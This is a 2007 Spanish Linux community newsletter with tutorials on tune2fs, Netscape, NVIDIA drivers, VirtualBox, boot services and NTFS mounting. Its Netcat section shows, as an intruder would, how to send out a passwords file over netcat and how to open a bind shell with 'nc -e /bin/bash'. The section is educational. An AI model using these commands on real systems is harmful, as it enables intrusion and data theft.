Boletín FL nº7 Año 2007 (revisión 1)

Enviado por Zx80 el Mar, 2007-11-13 10:47. ::

Boletín

Como siempre os tenemos preparado la séptima entrega del boletín online de FL cargado de información para todos los públicos. Tenemos desde comandos de configuración, hasta manuales multimedia, vamos, para todos los gustos. Espero que lo disfruteis.

Temas

1. Tune2fs
2. Netscape 9.0: Instalación. Experiencias al respecto
3. Actualizar nvidia-glx y xorg en Debian Sid
4. Virtualización con VirtualBox.
5. Herramientas de seguridad II: Netcat
6. Optimizando el arranque
7. Montar unidades NTFS en Debian
8. Compiz-Fusion en Debian
9. Agradecimientos y créditos

1. Tune2fs.

Por Vl@d

No se si a vosotros os ha pasado, pero os puedo asegurar que a mi si. Imaginad que un buen día os lleváis a un amigo a casa para enseñarle vuestro sistema GNU/Linux y que empezáis a presumir, por ejemplo, de la rapidez con la que arranca y tenéis ante vuestros ojos el escritorio.

Pero mira tu por donde, nada mas arrancar se produce una comprobación de sistema de ficheros durante el proceso de iniciar el sistema operativo. Claro, vuestro amigo sonríe y os dice que con Windows Vista ya se habría acabado todo el proceso de arranque.

Si nos fijamos bien mientras se produce este chequeo, vemos que nos avisa de que hacía 20 o 30 arranques (depende de la distribución que tengamos instalada) que no se producía, así que lo primero que nos viene a la cabeza es que la mejor forma de que no vuelva a pasar eso es aumentarle el número de arranques de sistema hasta que se haga obligatoria otra comprobación.

¿Pero como lo hacemos? En un primer momento podemos pensar que modificar algo de proceso de inicialización de GNU/Linux puede ser algo muy difícil, con complicados archivos de configuración y enrevesados comandos hasta conseguir nuestro propósito.

Pues nada mas lejos de la realidad. Nos vamos a valer del comando tune2fs y con solo una orden, pondremos el número de reinicios que queramos hasta que el chequeo del sistema de archivos vuelva a realizarse. Este comando está pensado para los sistemas de archivo ext2 y ext3.

Lo primero es identificarse como usuario root en una consola de comandos:

vlad@debian:~$ su
Password:
debian:/home/vlad#

Y ahora solo nos queda echar mano de la opción -c de tune2fs, con la cual estableceremos la cifra que queramos:

debian:/home/vlad# tune2fs -c 80 /dev/hda1
tune2fs 1.40.2 (12-Jul-2007)
Se pone la cuenta de montajes máxima a 80

No solo podemos establecer el número de montajes, sino que también el tiempo máximo en el que se realizará la comprobación, con independencia de las veces que hayamos montado la partición:

debian:/home/vlad# tune2fs -i 2m /dev/hda1
tune2fs 1.40.2 (12-Jul-2007)
Setting interval between checks to 5184000 seconds

Eso hará que lacomprobación se realice en 2 meses.

debian:/home/vlad# tune2fs -i 2d /dev/hda1
tune2fs 1.40.2 (12-Jul-2007)
Setting interval between checks to 172800 seconds

La hará en 2 dias.

Hemos de señalar que este comando ha de repetirse para todas aquellas particiones que queramos modificar. En este caso lo hemos hecho para /dev/hda1, donde tenemos / de nuestro Linux. Si quisiéramos hacerlo para una partición /home, sustituiríamos hda1 por el valor que correspondiera.

Pero si ponemos la opción -c 0 haremos que nunca haga el chequeo de particiones. Tune2fs tiene otras opciones. Aquí tenéis las más importantes:

-u uid: Establece el usuario del sistema para el que se reservará espacio.

-m n: Establece en tanto por ciento los bloques que se reservan.

-r n: Establece el número de bloques que se reservan.

-j: Cambiar un sistema de ficheros ext2 para convertirlo en ext3.

-C n: Cambiar el número de veces que el sistema ha sido montado.

2. Netscape 9.0: Instalación. Experiencias al respecto.

Por Noctuido

Voy a describiros la personalización a mi gusto con Netscape, es perfectamente trasladable a navegadores tan similares como Firefox, aunque este último se encuentra en la mayoría de repositorios, con lo que esta primera parte no es necesaria. Paso a describir el proceso:

Descargamos el Navegador Netscape 9.0 desde la página oficial. En mi caso lo descargo en cualquier sitio de nuestra carpeta personal, por ejemplo yo lo hago en /home/noctuido/

wget http://ftp.netscape.com/pub/netscape9/en-US/9.0b/unix/linux/netscape-navigator-9.0b3.tar.gz

NOTA: Seguramente cuando quieras descargar Netscape ya esté disponible una versión más nueva. Cambia la versión por la que quieras descargar.

Una vez hecha la descarga me situo en ese directorio y verifico que está ahí la descarga:

$ ls
netscape-navigator-9.0b3.tar.gz

Entro como root para descomprimir el archivo y comenzar el resto de la instalación (cada uno que aplique los permisos que más le interesen):

$ su
tar -C /opt -xzvf netscape-navigator-9.0b3.tar.gz

Creamos un enlace simbólico:

ln -s /opt/navigator/navigator /usr/bin/navigator

Editamos Navigator.desktop con cualquier editor (gedit, kate, kwrite...):

gedit /usr/share/applications/Navigator.desktop

Copiamos y pegamos lo siguiente:

[Desktop Entry]
Comment=Navigator Web Browser
Exec=navigator
GenericName=Navigator Web Browser
Icon=/opt/navigator/icons/mozicon50.xpm
Name=Navigator
Path=
StartupNotify=true
Terminal=0
TerminalOptions=
Type=Application
X-KDE-SubstituteUID=false
X-KDE-Username=
Categories=Network;Application;

Guardamos, nos salimos del editor y también salimos como root de la consola:

exit

Actualizo la barra de tareas de gnome:

killall gnome-panel

Si utilizamos KDE:

dcop kicker Panel configure

Una vez que comprobemos que Netscape funciona correctamente podremos deshacernos del archivo tar.gz que nos descargamos:

rm netscape-navigator-*

Llegado el caso y si quisieramos desistalarlo, los pasos serían los siguientes, entrando como root:

su
rm /usr/bin/navigator
rm /usr/share/applications/Navigator.desktop
rm -rf /opt/navigator

Para los que tengáis Ubuntu sólo debéis entrar con privilegios anteponiendo el comando sudo en cada línea de código. Más adelante iré diciendo qué añadidos particulares le voy haciendo.

Esto como dije antes es una manera muy personal de tener un navegador, por tanto si compartimos experiencias sería mucho mejor. No espero con ello que calquéis mis gustos, pero sería interesante como orientación en un principiante en el mundo de linux y de los navegadores gecko.

Cuando abrimos Netscape por primera vez, nos da la opción de importar los marcadores, cookies, o el historial entre otras opciones, desde navegadores como Mozilla u Opera.

Para los searchplugins de momento no existe esta opción, pero daré un par de pistas a continuación.

Para encontrar significados o sitios web que contengan una palabra es muy común utilizar el cajetín de búsquedas, el cual activamos con el atajo Control+K, desde el cual podemos seleccionar desde que buscadores, traductores, o diccionarios queremos hacer las búsquedas. Otra opción es la de que añadir o quitar los mismos, pulsando sobre el icono que se encuentra en la parte izquierda del cajetín +m. Ahí activaremos las opciones de borrado o modificar su posición. La carpeta de searchplugins se encuentra en la instalación que he realizado en:

/opt/navigator/searchplugins/

Para ir agregando más motores de búsqueda al cajetín recurriremos a añadirlos a la página mycroft.mozdev.org. La página de mycroft contiene un buscador para escoger los searchplugins que busquemos, que se añadiran simplemente pulsando sobre ellos, previa confirmación. Una vez añadidos éstos tendremos, un archivo nuevo dentro del archivo oculto, junto con todos los añadidos que le hagamos y Netscape no traiga de serie, el cual se encuentra en:

/home/noctuido/.navigator/

Para ver las búsquedas que tenemos realizadas, pulsaremos la la tecla con la flecha hacia abajo y nos lo mostrará en orden alfabético, estando el cajetín activado (Control+K).

Para borrar las búsquedas realizadas iremos a Editar-->Preferencias-->Privacidad-->Datos Privados-->Limpiar ahora-->tildamos historial de descargas.

Para una visión más amplia de este cajetín vamos a el menú Ver-->Barras de Herramientas-->Personalizar... o lo que es lo mismo View-->Toolbars-->Cusomize... una vez se abra la ventana con los iconos podemos mover el cajetín hacia la barra de herramientas donde hay más espacio, así como modificar la situación del resto de iconos si nos interesase.

Sin embargo si queremos hacer las búsquedas con palabra clave, ya hicimos un interesante hilo al respecto. La traducción sería la siguiente con los ejemplos de ese hilo:

Marcadores-->Administrar Marcadores-->Nuevo Marcador. equivale a Bookmarks--->Organize Bookmarks------>New Bookmark.

3. Actualizar nvidia-glx y Xorg en Debian SID.

Por Kallikantzaroi

Los que usamos Debian Sid a veces nos encontramos que en alguna actualización de paquetería nos pide desinstalar el pakete nvidia-glx para poder actualizar el Xorg, en estas situaciones tendremos que esperar a que entren en la actualización los paquetes nvidia-kernel-source o nvidia-kernel.
Una vez hallan entrado estos paquetes actualizamos a saco, con ello se desinstalará el paquete mencionado: nvidia-glx, pero no os preocupeis, una vez actualizada toda la paquetería abrimos una consola (como root) y sencillamente reinstalando el driver de nVidia lo solucionaremos:

kallizantzaroi@kall:~$ su

Password:

kalli:/home/kallizantzaroi# module-assistant auto-install nvidia

Updated infos about 1 packages
Getting source for kernel version: 2.6.22-2-amd64
Kernel headers available in /lib/modules/2.6.22-2-amd64/build
apt-get install build-essential
Se esta leyendo la lista de paquetes... Hecho
Se esta construyendo el arbol de dependencias
Reading state information... Fet
build-essential ya esta en la versión mas reciente.
0 actualitzados, 0 nuevos a instalar, 0 a eliminar y 0 no actualitzados.

Done!
unpack
Extracting the package tarball, /usr/src/nvidia-kernel-source.tar.gz, please wait...
"/usr/share/modass/packages/default.sh" build KVERS=2.6.22-2-amd64 KSRC=/lib/modules/2.6.22-2-amd64/build KDREV=2.6.22-4 kdist_image

Tras hacer la instalación de paquetes bajo un entrono ncurses no saldrá algo como esto:

Done with /usr/src/nvidia-kernel-2.6.22-2-amd64_100.14.19-1+2.6.22-4_amd64.deb .
dpkg -Ei /usr/src/nvidia-kernel-2.6.22-2-amd64_100.14.19-1+2.6.22-4_amd64.deb
(Se esta leyendo la base de datos ... hay 239028 archivos y directorios
instalados actualmente.)
Se esta preparando para remplazar nvidia-kernel-2.6.22-2-amd64
100.14.11-1+2.6.22-4 (haciendo servir .../nvidia-kernel-2.6.22-2-amd64_100.14.19-1+2.6.22-4_amd64.deb) ...
Se esta desempaquetando el remplazo de nvidia-kernel-2.6.22-2-amd64 ...

************************************************************************
*
* The update-modules command is deprecated and should not be used!
*
************************************************************************

Se esta configurando nvidia-kernel-2.6.22-2-amd64 (100.14.19-1+2.6.22-4) ...

Una vez reinstalado el driver procedemos a instalar el nvidia-glx

kalli:/home/kallikantzaroi# apt-get install nvidia-glx

Se esta leyendo la lista de paquetes... Hecho
Se esta construyendo el arbol de dependencias
Reading state information... Hecho
Se instalaran los siguientes paquetes NUEVOS:
nvidia-glx
0 actualitzados, 1 nuevos a instalar, 0 a eliminar y 0 no actualizados.
Se necesita obtener 4934kB de archivos.
Despues de desempaquetar se usaran 13,9MB de espacio en disco adicional.
Des:1 http://ftp.fi.debian.org unstable/non-free nvidia-glx 100.14.19-1 [4934kB]
4934kB descargados en 12s (410kB/s)
Se esta selecionando el paquete nvidia-glx previamente no seleccionado.
(Se esta leyendo la base de datos ... hay 239028 archivos y directorios instalados actualmente.)
Se esta desempaquetando nvidia-glx (de .../nvidia-glx_100.14.19-1_amd64.deb) ...
Se esta configurando nvidia-glx (100.14.19-1) ...
Se esta instalando una versión nueva del archivo de configuración /etc/init.d/nvidia-glx ...
Creating NVIDIA TLS links... done.
kalli:/home/kallikantzaroi#

Como podreis observar, 1º reinstalo el driver con el clásico #module-assistant auto-install nvidia, una vez se ha reinstalado el driver simplemente se vuelve a instalar el paquete nvidia-glx #apt-get install nvidia-glx y ya está, paquetería actualizada con el new Xorg y driver reinstalado.

Todo esto puede hacerse sin salir del sistema gráfico, aunque tambien puede hacerse desde fuera. Por cierto.... con las ATI debe ser similar siguiendo el proceso correspondiente de instalación del driver a la Debian.

PD: El kernel que uso es un 2.6.22-2-amd64.

4. Virtualización con VirtualBox.

Por ZX80

Ultimamente la palabra virtualización está teniendo mucho renombre y no hay web en la que aparezca, pero ¿sabemos que significa, para que se utiliza?

Cuando en un equipo tenemos varios sistemas operativos y tenemos que usarlos indistintamente hay que reiniciar la máquina para iniciar en ese sistema que necesitamos usar, con el engorro que ello conlleva. Pues de una manera cómoda y fácil, mediante la virtualización se ha conseguido poder iniciar otro sistema operativo bajo el que ya tenemos iniciado, sin necesidad de tener que reiniciar.

En una máquina de escritorio podemos usar Windows virtualizado bajo Linux y viceversa, pero donde de verdad tiene todo su poder es en servidores, aunque ese aspecto no lo voy a tocar.

Hay muchos programas de virtualización, tal vez el más conocido es Vmware o VirtualPC, que son propietarios, aunque hay alternativas libres de muy buena calidad como qemu o virtualbox. De éste último voy a hablaros en este manual que espero que os sea útil.

Instalando VirtualBox.

Lo primero de todo es instalar la aplicación, que cada uno hará desde el gestor de su distribución Linux (apt-get, urpmi, emerge...) o tambien se puede descargar e instalar manualmente desde su web: http://www.virtualbox.org/

Una vez instalado deberemos añadir nuestro usuario al grupo vboxusers para que se pueda ejecutar, esto lo hacemos con el comando "gpasswd -a usuario vboxusers" eso si, como root, y reiniciar la máquina (si, es necesario).

Otra precaución que debemos tomar es desactivar el NMI Watchdog que suele venir activado por defecto en muchos kernels que es una aplicación de seguridad y que hace que virtualbox no pueda cargar el módulo vboxdrv, necesario para su funcionamiento. No hace falta desactivarlo en el kernel, sino que se puede pasar como parámetro del mismo o dejarlo fijo si editamos el archivo /boot/grub/grub.conf. En otras distribuciones se desactiva automáticamente. En mi caso este es el apecto del archivo:

default 0
timeout 10
splashimage=(hd0,0)/boot/grub/splash.xpm.gz

title=Gentoo Linux
root (hd0,0)
kernel /boot/kernel-genkernel-x86_64-2.6.18-gentoo root=/dev/ram0 init=/linuxrc ramdisk=8192
real_root=/dev/sda1 acpi=off doscsi nmi_watchdog=0
initrd /boot/initramfs-genkernel-x86_64-2.6.18-gentoo

En caso de no lanzarse automáticamente el módulo lo haremos manualmente mediante el comando "modprobe vboxdrv", aunque recomiendo cargarlo en el archivo de autocarga de módulos de cada distribución, en mi caso /etc/modules.autoload.d/kernel-2.6

Empezamos !!!!

Al ejecutar virtualbox nos sale una ventanita de bienvenida muy amigable y unas opciones para seleccionar. Al ser la primera vez que lo iniciamos deberemos seleccionar el iconito que pone "Nueva", como muestra la imagen, y nos llevará a otra ventana para la creación de un espacio virtual:

Virtualbox funciona con imágenes de discos duros con extensión VDI o en su defecto, espacio que creamos en nuestro disco duro local que asignaremos como queramos, así que deberemos seleccionar un disco que tengamos o crear un espacio en el disco local, que es lo que yo voy a hacer. Selecciono "Nuevo" y configuro el espacio y demás parámetros de la futura imagen de disco.

Nos da dos opciones: un espacio fijo o dinámico. Este último se va llenando hasta el límite que le demos, por lo que el espacio en el disco físico se gestiona según vayamos instalando aplicaciones en nuestro sistema virtual, con el consiguiente ahorro de espacio físico.

Además deberemos darle un nombre a nuestro sistema y decirle el tipo de sistema que vamos a poner y la ruta.

El sistema que yo quiero poner es un Windows XP al que llamaré vwindows y elijo una partición dinámica de 8 Gigas con 640 Mb de RAM y 24 Mb de video, una configuración bastante apañada para ejecutar un XP más o menos en condiciones.
Como vemos en la imagen anterior, al haber creado un disco virtual ya nos deja elegirlo en las opciones. Podemos crear cuantos discos queramos con los diferentes sistemas operativos virtuales incluso guardarlos en DVD para irlos poniendo cuando convenga.

NOTA: Todas estas opciones se pueden cambiar más tarde cuando esté creada la imagen VDI desde el iconito "Configuración".

Una vez creada la imagen de disco y darle al botón "Finalizar" nos aparece de nuevo la ventanita de Bienvenida, pero esta vez ya tenemos un sistema para seleccionar y una zona lateral derecha con las características del sistema virtual seleccionado.

Además, en el iconito de "Configuración" podemos cambiar las opciones que hemos elegido, pero además otros aspectos, como el sistema de arranque del sistema virtualizado, el sistema de audio, la red (que dejaremos en modo NAT), incluso podremos crear otro espacio de disco virtual y ponerselo como esclavo además de compartir carpetas, vamos, como si de un sistema nativo se tratara.

Si ahora le damos al icono de "Iniciar" empezará la instalación de windows. Debemos montar el CD desde Linux para que no hayan problemas, introducimos el CD y a instalar se ha dicho.

Y una vez instalado ya podemos empezar a usarlo, instalar aplicaciones y hacer lo que haríamos con un windows nativo.

Virtualbox-additions, los plug-ins de Virtualbox.

Como todo buen programa que se tercie, existen añadidos para mejorar el programa base que no necesitan estar instalados para que la propia aplicación funcione, pero sí nos dará soporte extra o más funcionalidades, y este es el caso de Virtualbox-additions.
Entre otras cosas permite que el puntero del ratón no quede "encerrado" dentro de la aplicación, sino que sea libre y pueda moverse por toda la pantalla, cosa que sin las additions se consigue pulsando cada vez que queramos la tecla CTRL derecha. Además se puede redimensionar la ventana del sistema virtualizado ajustándose al tamaño de la ventana.

Una vez instalado deberemos cargarlo dentro del sistema virtualizado, por lo que dentro de windows nos iremos a la pestaña "Dispositivos", desmontaremos el CD/DVD (si no lo estaba) y volveremos a montar, pero en este caso elegiremos "Imagen iso", dandole la ruta a la iso de los additions, que en mi caso es /opt/virtualbox/additions/VBoxGuestAdditions.iso y empezará la instalación dentro de windows.

NOTA: Para el uso de carpetas compartidas se necesita tener instalado virtualbox-additions.

Uso de carpetas compartidas.

Si ya tenemos archivos en nuestro disco duro local podremos usarlos desde el sistema virtualizado mediante el uso de carpetas compartidas.
Nos iremos a "Configuración" y en la sección "Carpetas compartidas" seleccionaremos la ruta a la carpeta real que queremos compartir y le daremos un nombre. Podemos añadir las que queramos y editarlas si queremos cambiar algo.
En mi caso la ruta es una carpeta de almacenamiento de 1 Gb bajo FAT32 llamada store que cuelga de /mnt.

Como dice el propio Virtualbox, para poder acceder a ella desde Windows deberemos abrir una consola en Linux y teclear:

VBoxManage sharedfolder add "vwindows" -name "store" -hostpath "/mnt/store"

Esto hace que Virtualbox sepa que carpeta debe compartir, y desde una consola en windows tecleamos:

net use H: \\vboxsrv\store

La letra H se puede cambiar por la que queramos siempre y cuando no esté en uso por el sistema virtualizado.

Pues ya está, ahora, como de cualquier windows se tratara, veremos una carpeta compartida en "Mi Pc".

Concluyendo.

Me ha sorprendido gratamente VirtualBox por su extrema facilidad de uso que hasta mi sobrinillo de 5 años es capaz de ponerlo a rodar, pero lo que más me ha sorprendido es la tremenda velocidad y soltura con la que se mueve el sistema virtualizado sin darle muchos recursos del sistema, además el rendimiento del sistema "físico" no se resiente por tener en memoria otro sistema, de echo la CPU no pasaba nunca del 45% en mi equipo, un AMD 64 3800+ con 1 Gb de RAM.

No he tenido problemas con la red, sonido ni con la gráfica, pero para el soporte USB debemos instalar la versión 1.5.
Mediante los additions, aun reescalando la ventana al máximo no se nota ralentización alguna y se puede ver video online, escuchar música, etc sin pérdidas de calidad ni saltos, aunque he tenido algunos problemas con las carpetas compartidas.

Los juegos en 3D no funcionan, ya que de momento el sistema no emula el soporte gráfico acelerado, por lo que algunas aplicaciones como Joost o los juegos no irán.

En fin, un buen programa que recomiendo a todos.

5. Herramientas de seguridad II: Netcat

Por Vl@d

Netcat es sin duda una de las herramientas de seguridad informáticas mas populares dentro de GNU/Linux, no solo por su potencia y posible expansión combinada con lenguajes de programación como C, sino por la cantidad de usos que tiene, de ahí que se le conozca popularmente como la navaja multiusos.

Que mejor herramienta para testear la seguridad de nuestro pc de sobremesa o servidor que la que utilizan “los amigos de lo ajeno”, en este pequeño tutorial vamos a poder ver algunos ejemplos de lo que se puede hacer con netcat y veremos sus posibilidades.

La primera característica que nos en contramos en Netcat es que podemos incluso utilizarlo como escaner de puertos, aunque hemos de decir que tal vez no sea la herramienta mas adecuada para estos menesteres, ya que programas como nmap nos ofrecen mas potencia, posibilidades y sobre todo “sigilo” a la hora de escanear un host en busca de algun puerto abierto. Veamos un ejemplo en un escaneo sobre nuestro propio ordenador:

saruman:/home/vlad# nc -v -v -z 127.0.0.1 19-24

localhost [127.0.0.1] 19 (chargen): Conexión rehusada
localhost [127.0.0.1] 20 (ftp-data): Conexión rehusada
localhost [127.0.0.1] 21 (ftp): Conexión rehusada
localhost [127.0.0.1] 22 (ssh) open
localhost [127.0.0.1] 23 (telnet): Conexión rehusada
localhost [127.0.0.1] 24: Conexión rehusada
Total received bytes: 0
Total sent bytes: 0

Como podemos observar, le podemos indicar el rango de puertos a escanear, aunque por supuesto, también podríamos indicarle un solo puerto.

Como administradores del sistema, es posible que queramos estar “a la escucha” en algún puerto de nuestro host, para ver si hay un intento de entrada maliciosa. Con netcat es muy fácil realizar esta tarea, basta con poner el siguiente comando en la consola y toda aquella conexión que se realice a ese puerto, nos aparecerá en pantalla:

saruman:/home/vlad# nc -t -v -v -l 127.0.0.1 -p 3000

Listening on any address 3000

Ya lo hemos dejado escuchando, ahora se produce un telnet a nuestro sistema y a ese puerto concretamente:

tepes@enemy:~$ telnet 192.168.2.3 3000
Trying 192.168.2.3...
Connected to localhost.
Escape character is '^]'.

Y queda registrado:

saruman:/home/vlad# nc -t -v -v -l 127.0.0.1 -p 3000
Listening on any address 3000
Connection from 192.168.2.2:45529

Imaginemos ahora que nuestro agresor ya se ha colado en nuestro sistema y que quiere transferir un archivo importante a su máquina. Esto lo puede hacer fácilmente aprovechándose de las características de esta buenísima herramienta. En la máquina atacada ejecutará:

saruman:/home/vlad# nc -l -p 1500 < contraseñas.txt

Esto hace que se ponga a la escucha en el puerto 1500 de la máquina víctima y al mismo tiempo, este “sirviendo” el archivo contraseñas.txt. Cualquier conexión a ese puerto hará que el contenido del archivo aparezca en la otra máquina. Desde su host ejecutará:

tepes@enemy:~$ nc 192.168.2.3 1500 > contrseñas.recibidas.txt

Mediante esta forma de usarlo, podemos hacer que se comporte como un servidor web, bastará con servir el archivo con extensión html y conectarnos desde el otro ordenador a esa ip y al puerto especificado:

saruman:/home/vlad# nc -l -p 8000 < index.html

Quizá ya os habréis dado cuenta de que podemos usar netcat para chatear directamente de host a host. Lo mismo que servimos ficheros, podemos escribir directamente sobre el bufer:

saruman:/home/vlad# nc -l -p 3000

holaaaa
¿como estas?

Y en el cliente:

tepes@enemy:~$ nc 192.168.2.3 3000

holaaaa
¿como estas?

Pero no contento con eso, lo que nuestro enemigo quiere hacer directamente es conseguir una shell donde ejecutar comandos directamente. Gracias a la opción -e lo va a conseguir, en el host atacado bastará con ejecutar:

tepes@enemy:/home/vlad# nc -l -p 12345 -e /bin/bash

Esto hace que en el puerto 12345 haya una shell disponible para todas aquellas conexiones entrantes. Ahora desde la máquina atacante:

tepes@enemy:~$ nc 192.168.2.3 12345

Y todo aquel comando válido que ejecute, repercutirá sobre el sistema atacado. Imaginad que por arte de magia se os abre el lector de dvd...

Con este sencillísimo tutorial hemos visto que Netcat es de las mejores aplicaciones en cuanto a seguridad informática disponible en GNU/Linux.

6. Optimizando el arranque

Durante el arranque del sistema, se inician una serie de servicios llamados "Daemons" (demonios), algunos esenciales, otros no. Cada distribución de Linux pone los que considere o si se elije la instalacion personalizada podremos elejir los q nos interese. Por ejemplo Fedora, SUSE o Mandrake inician por defecto otros servicios "por si acaso". Eliminándolos ahorraremos memória y reduciremos el tiempo de arranque del sistema operativo.

Primero debemos saber cual es nuestro runlevel. Para eso miraremos el archivo /etc/inittab. Donde dice:

id:3:initdefault

En este caso nos indica que nuestro runlevel por defecto es el 3. En la carpeta /etc/rc.d o /etc/init.d están las carpetas rcx.d (donde x es el numero de runlevel) en la que cada cual tiene los servicios que se ejecutan. Nuestro runlevel es el 3, así que nos metemos en rc3.d.

Aquí vemos unos scripts, y los que nos interesan son los que empiezan por S, q son lo que inician el demonio (S de Start) NO vamos a borrarlos, por si acaso sino q basta con renombrarlo poniendo un # delante, por ejemplo.
Aquí van los servicios que solemos tener:

- Alsa: Inicia el sonido si durante la instalación se configuró con este driver. Si no, no es necesario.
- Apmd: Para portátiles, comprueba la batería y cuando esté baja apaga correctamente el sistema. En un pc lo podemos borrar.
- Autofs: Monta automáticamente sistemas de ficheros bajo demanda. Podemos eliminarlo y hacer los montajes estáticos.
- Crond: Ejecuta tareas esenciales para el sistema cada cierto tiempo. No se quita.
- Cups: El sistema de impresión. Si tu impresora usa otro sistema que no sea Cups, puedes quitarlo (recuerda lo que dije de renombrar).
- Gpm: Para usar el ratón en la consola si no estamos usando el entorno gráfico.
- Harddrake: En Mandrake, herramienta de detección automática de hardware. Si no cambias de hardware a menudo, puedes desactivarlo.
- Hpoj: Solo si tienes un escanner de HP.
- Httpd: Inicia el servidor web Apache. Si no tienes una página web alojada en tu ordenador, ya sabes.
- Inetd: Daemon de los servicios de internet. Se queda.
- Iptables: El firewall. Aprende a protejer tu máquina.
- Iplog: Hace logs de conexiones TCP, UDP Y ICMP. Se puede quitar.
- Kdm: El login manager de KDE.
- Keytable: Carga los códigos de teclado de nuestro idioma. Si lo desactivas solo podrás usar el teclado americano.
- Kudzu: Herramienta de detección de hardware de Red Hat. Igual que Harddrake, desactívalo y ejecútalo cuando lo necesites.
- Mon: Monitorización remota del sistema. No lo necesitamos.
- Mysql: Si no usas esta base de datos, desactívalo.
- Netfs: Monta los sistemas de ficheros remotos de red, NFS, SMB y NCP. Eso se puede mejor con Samba, así que fuera.
- Network: Está claro que se queda.
- Nfs: Si tu pc no es un servidor NFS, quítalo.
- Nfslock: Necesario para un servidor NFS.
- Numlock: Activa el teclado numérico. No afecta al rendimiento.
- Portmap: Es el servidor RPC de linux, el punto de entrada de las llamadas a procedimientos remotos y es usado por NFS.
- Postgresql: Si no usas esta base de datos, ya sabes.
- Proftpd: Si no quieres tener un servidor FTP en tu pc, quítalo.
- Random: Genera números aleatorios, no se cual es su utilidad, pero se recomienda tenerlo.
- Rawdevices: Son devs que no cachean lo que escribes, a diferencia de los de bloque. Lo pueden usar dispositivos fireware o dispositivos que tengan memoria en la puedas escribir (por ejemplo, una impresora en la que puedas guardar fotos).
- Smb: Si usas Samba.
- Sound: Inicia el sonido si lo hemos configurado con OSS.
- Sshd: Si usas SSH para realizar conexiones seguras.
- Syslog: Gestor de históricos. No se debe quitar.
- Webmin: Si no usas este programa para configurar tu pc, quítalo.
- Xfs: Servidor de fuentes de Xwindow. se queda.
- Xinetd: Daemon de los servicios de internet. Se queda.

Pueden existir otros servicios q no aparezcan aquí y no sabes que hace cada servicio puedes usar http://www.google.com/linux

Cuando no se usa el entorno gráfico y trabajas en modo texto, se activan seis terminales, que puedes cambiar pulsando Alt - F1 para la primera, Alt - F2 para la segunda, etc. Sería raro que necesitaras más de tres, así que vuelve al archivo /etc/inittab:

1:2345:respawn:/sbin/agetty 38400 vc/1 linux
2:2345:respawn:/sbin/agetty 38400 vc/2 linux
3:2345:respawn:/sbin/agetty 38400 vc/3 linux
4:2345:respawn:/sbin/agetty 38400 vc/4 linux
5:2345:respawn:/sbin/agetty 38400 vc/5 linux
6:2345:respawn:/sbin/agetty 38400 vc/6 linux

(El formato puede variar en tu distribución). Cada una usa unos 500 Kb de memoria, así que pon una # delante de las terminales 4, 5 y 6 para desactivarlas, así:

- 4:2345:respawn:/sbin/agetty 38400 vc/4 linux
- 5:2345:respawn:/sbin/agetty 38400 vc/5 linux
- 6:2345:respawn:/sbin/agetty 38400 vc/6 linux

Guarda los cambios y ejecuta "init q"

7. Montar unidades NTFS en Debian

Por Andrey

Dado que ya sabemos como añadir nuevas particiones y dispositivos de almacenamiento en general en formatos como fat32, reiserfs y ext3, aquí hablaré de como podemos montar particiones de Windows (si lo tenemos, claro) en formato NTFS. Se tiene que hacer de manera especial, por que GNU/Linux (estamos hablando de Debian en concreto), por defecto no trae mucho soporte (de momento) para NTFS, y no se puede escribir sin mas.

Voy a explicar un método, que hace poco salió a la luz como estable. Este método se llama NTFS-3G. Consiste en correr un “daemon” automático, que implemente soporte completo para ntfs. Utilizando como formato de comprensión el ntfs-3g.

Fuse & ntfs-3g

Suponiendo que tenemos aún alguna partición de Windows en la máquina, vamos a montarla. El primer paso, es averiguar que etiqueta tiene la partición, si hda1, hda2 etc... Cuando tengamos esto, es hora de darle a la consola (o al ratón):

1- Deberemos descargar los paquetes referentes a ntfs-3g:

debian:/home/andrey# apt-get install fuse-utils libfuse2 libntfs-3g0 libntfs-3g-dev libfuse-dev ntfs-3g

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias... Hecho
Se instalarán los siguientes paquetes NUEVOS:
fuse-utils libfuse-dev libfuse2 libntfs-3g-dev libntfs-3g0 ntfs-3g
0 actualizados, 6 se instalarán, 0 para eliminar y 45 no actualizados.
Necesito descargar 439kB de archivos.
Se utilizarán 1393kB de espacio de disco adicional después de desempaquetar.
Des:1 http://ftp.fi.debian.org unstable/main fuse-utils 2.6.3-3 [72,6kB]
[...]
Configurando fuse-utils (2.6.3-3) ...
creating fuse device node...
udev active, devices will be created in /dev/.static/dev/
creating fuse group...
[...]
Configurando libntfs-3g-dev (1.328-2) ...

De los dos modos tendremos que aceptar una licencia (sí, sí, como las de Windows..)
Los paquetes referentes a Fuse, serán el programa en sí, y el paquete ntfs-3g es el soporte de ntfs que utilizaremos. Fuse será el propio “daemon” a instalar. Sin él, simplemente no funcionará. Normalmente se tiene que instalar como dependencia automática para ntfs-3g.

2- Creamos punto de montaje. Deberemos crear un punto de montaje, ya que la partición NTFS, será a partir de ahora como una partición más del sistema. Entonces desde la consola como root, escribimos:

mkdir /mnt/wind

En vez de /mnt, podemos usar /media. Como siempre, el nombre de la carpeta es personal, siempre y cuando mantengamos ese nombre en los pasos siguientes.

3- Cuando tengamos instalados estos paquetes e identificada la partición a montar, abrimos de nuevo el fstab con el comando (previa identificación root):

gedit /etc/fstab

Ahora añadiremos una linea más al fstab. Así que empezaremos poniendo el ejecutable de la partición, seguido por un espacio, y el punto de montaje que hemos creado más arriba pero en el campo “formato” donde supuestamente deberíamos poner “ntfs”, ahora pondremos ntfs-3g, como el soporte de fuse que hemos descargado antes.

Ahora seguimos poniendo las opciones normalmente... Aquí es gusto de cada cual, pero hay unas normas que seguir. El programa (fuse) usa como predeterminado el idioma Inglés, por lo que cuando montemos nuestras unidades con dicho programa estarán solo soportando carácteres ingleses (no soportará ni tildes ni eñes lo cual es inconveniente por que dará error a la hora de leer ciertos archivos), por lo que tendremos que cabiar el idioma de montaje. Añadiremos esta opción:

locale=es_ES.utf8

Además yo quiero que se monte a cada inicio y que la pueda gestionar todo usuario de mi ordenador. Después pondremos los dos números a nuestro gusto. En mi caso SI deseo que la chequee cada inicio, y añado: 0 2
De modo que el resultado final de nuestra nueva linea nos queda así (hay muchas opciones nuevas, que no son imprescindibles):

/dev/hda4 /mnt/wind ntfs-3g silent,umask=0,locale=es_ES.utf8,no_def_opts,allow_other 0 2

